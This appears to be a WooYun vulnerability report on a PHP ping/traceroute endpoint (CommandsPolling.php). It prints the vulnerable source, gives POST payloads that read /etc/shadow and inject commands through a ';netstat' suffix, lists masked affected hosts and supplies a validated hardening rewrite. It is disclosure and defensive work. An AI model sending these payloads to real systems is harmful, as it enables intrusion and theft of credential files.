WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-09-16: Details sent to the vendor; awaiting vendor handling
2015-09-18: Vendor confirmed; details disclosed to the vendor only
2015-09-21: Details opened to third-party security partners
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public
As the title says.
The root cause is in the file /direct/polling/CommandsPolling.php; see the source code for details:
<?php
include_once 'command/CCmdsPolling.php';

// All three POST fields are taken as-is. $cmdParam is only trimmed, never
// validated as an IP/hostname; $saveFile is never restricted to a file name.
$command  = isset($_POST['command'])  ? $_POST['command']  : "";
$saveFile = isset($_POST['filename']) ? $_POST['filename'] : "";
$cmdParam = isset($_POST['cmdParam']) ? $_POST['cmdParam'] : "";
$cmdParam = trim($cmdParam);
$faultStr = json_encode(array('type' => 'event', 'name' => 'message', 'data' => array("exception", "", "")));

// command is null
if (empty($command)) {
    echo $faultStr;
    exit();
}

// exec and get result
// The unvalidated target and file name are handed straight to the polling class,
// which runs ping/traceroute and reads/writes the named result file.
$result = array();
$pollingObj = new CCmdsPolling();
if ($command == "ping") {
    $result = $pollingObj->getPingInfo($cmdParam, $saveFile);
} else if ($command == "traceroute") {
    $result = $pollingObj->getTracerouteInfo($cmdParam, $saveFile);
} else {
    echo $faultStr;
    exit();
}

// analyse result state and return
// Whatever the polling class read from the result file is echoed back to the client.
if ($result['state'] == "exception") {
    echo $faultStr;
} else if ($result['state'] == "starting") {
    $re_file  = $result['result'];
    $filename = $result['filename'];
    $finished = false;
    echo json_encode(array(
        'type' => 'event',
        'name' => 'message',
        'data' => array("starting", $re_file, $filename)
    ));
} else if ($result['state'] == "dealing") {
    $re_file  = $result['result'];
    $filename = $result['filename'];
    echo json_encode(array(
        'type' => 'event',
        'name' => 'message',
        'data' => array("dealing", $re_file, $filename)
    ));
} else if ($result['state'] == "finished") {
    $re_file = $result['result'];
    echo json_encode(array(
        'type' => 'event',
        'name' => 'message',
        'data' => array("finished", $re_file, "")
    ));
} else {
    echo json_encode(array(
        'type' => 'event',
        'name' => 'message',
        'data' => array("unknown", "", "")
    ));
}

?>
Exploitation is as follows:
1. Arbitrary system file read (file traversal):
POST to https://<address>/direct/polling/CommandsPolling.php with: command=ping&filename=/etc/shadow&cmdParam=**.**.**.**
2. Arbitrary system command execution:
At https://<address>/direct/polling/CommandsPolling.php, first submit the command to run, POST: command=ping&filename=&cmdParam=**.**.**.**;netstat
Next, obtain the path of the file in which the command result is saved, POST: command=ping&filename=&cmdParam=**.**.**.**,netstat
Finally, fetch the file contents (the command output), POST: command=ping&filename=&cmdParam=**.**.**.**,netstat
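Both techniques above come from the same defect: the handler forwards the raw `cmdParam` and `filename` POST fields to the polling class. The block below is an added hardening example, not the vendor's code: it shows the input handling rewritten with allow-lists, so that a target can only be an IP address or a hostname and a result file can only be a bare name inside one fixed directory. RESULT_DIR, validateTarget(), validateSaveFile(), buildPingCommand(), handleRequest() and selfCheck() are names assumed for this example, the directory path is a constructed placeholder, and the internals of CCmdsPolling (which the page does not show) are not reproduced.

```php
<?php
// Added hardening example for the CommandsPolling.php input handling; not the
// vendor's code. All names below are assumed for the example.

const RESULT_DIR = '/var/tmp/polling';   // constructed placeholder for the result-file directory

// Accept only a literal IP address or a plain hostname. Shell metacharacters
// (';', '|', '&', '`', '$', spaces, newlines) are outside the allowed alphabet,
// so a value such as "**.**.**.**;netstat" is rejected before any command is built.
function validateTarget(string $raw): ?string
{
    $t = trim($raw);
    if ($t === '' || strlen($t) > 253) {
        return null;
    }
    if (filter_var($t, FILTER_VALIDATE_IP) !== false) {
        return $t;
    }
    // RFC 1123 style labels: alphanumerics with inner hyphens, dot separated.
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return preg_match('/^' . $label . '(\.' . $label . ')*$/', $t) ? $t : null;
}

// Accept only a bare file name that lives inside RESULT_DIR. An empty name keeps the
// original meaning (start a new job); "/etc/shadow" or "../x" can never be produced.
function validateSaveFile(string $raw): ?string
{
    if ($raw === '') {
        return '';
    }
    if ($raw === '.' || $raw === '..' || !preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $raw)) {
        return null;
    }
    $path = RESULT_DIR . '/' . $raw;
    // An existing entry could be a symlink pointing outside the directory: refuse it.
    if (file_exists($path) && realpath($path) !== realpath(RESULT_DIR) . '/' . $raw) {
        return null;
    }
    return $path;
}

// The shell boundary: even a validated target is quoted with escapeshellarg()
// (POSIX single-quote quoting).
function buildPingCommand(string $target): string
{
    return '/bin/ping -c 4 ' . escapeshellarg($target);
}

// Validates the three POST fields the original handler reads. Returns
// ['ok' => false, 'reply' => <fault JSON>] for bad input, otherwise
// ['ok' => true, ...] carrying only the validated values for CCmdsPolling.
function handleRequest(array $post): array
{
    $fault    = json_encode(['type' => 'event', 'name' => 'message', 'data' => ['exception', '', '']]);
    $command  = (string) ($post['command'] ?? '');
    $target   = validateTarget((string) ($post['cmdParam'] ?? ''));
    $saveFile = validateSaveFile((string) ($post['filename'] ?? ''));
    if (!in_array($command, ['ping', 'traceroute'], true) || $target === null || $saveFile === null) {
        return ['ok' => false, 'reply' => $fault];
    }
    return ['ok' => true, 'command' => $command, 'target' => $target, 'saveFile' => $saveFile];
}

// Constructed inputs mirroring the two techniques in the report; run with `php -f <file>`.
function selfCheck(): bool
{
    $inject = handleRequest(['command' => 'ping', 'filename' => '', 'cmdParam' => '192.0.2.1;netstat']);
    $read   = handleRequest(['command' => 'ping', 'filename' => '/etc/shadow', 'cmdParam' => '192.0.2.1']);
    $dotdot = handleRequest(['command' => 'ping', 'filename' => '../../etc/shadow', 'cmdParam' => '192.0.2.1']);
    $good   = handleRequest(['command' => 'ping', 'filename' => 'job_1.txt', 'cmdParam' => 'gw.example.net']);
    return $inject['ok'] === false
        && $read['ok'] === false
        && $dotdot['ok'] === false
        && $good['ok'] === true
        && $good['saveFile'] === RESULT_DIR . '/job_1.txt'
        && buildPingCommand('192.0.2.1') === "/bin/ping -c 4 '192.0.2.1'";
}

if (PHP_SAPI === 'cli') {
    echo selfCheck() ? "self-check passed\n" : "self-check FAILED\n";
}
```

The two checks are independent on purpose: validateTarget() closes the command-injection path regardless of how CCmdsPolling assembles its command line, and validateSaveFile() closes the file-read path regardless of how the result file is opened; escapeshellarg() is kept as a second layer at the shell boundary rather than as the only defence.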
Cases:
**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/https://5mart.**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/https://www.**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://www.**.**.**.**/**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/https://**.**.**.**/https://**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/**.**.**.**/
Contact the vendor.
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-09-18 13:51
CNVD confirmed and reproduced the reported issue and has notified the software vendor through its existing handling channels. The vendor reports that it is actively working on it.
None yet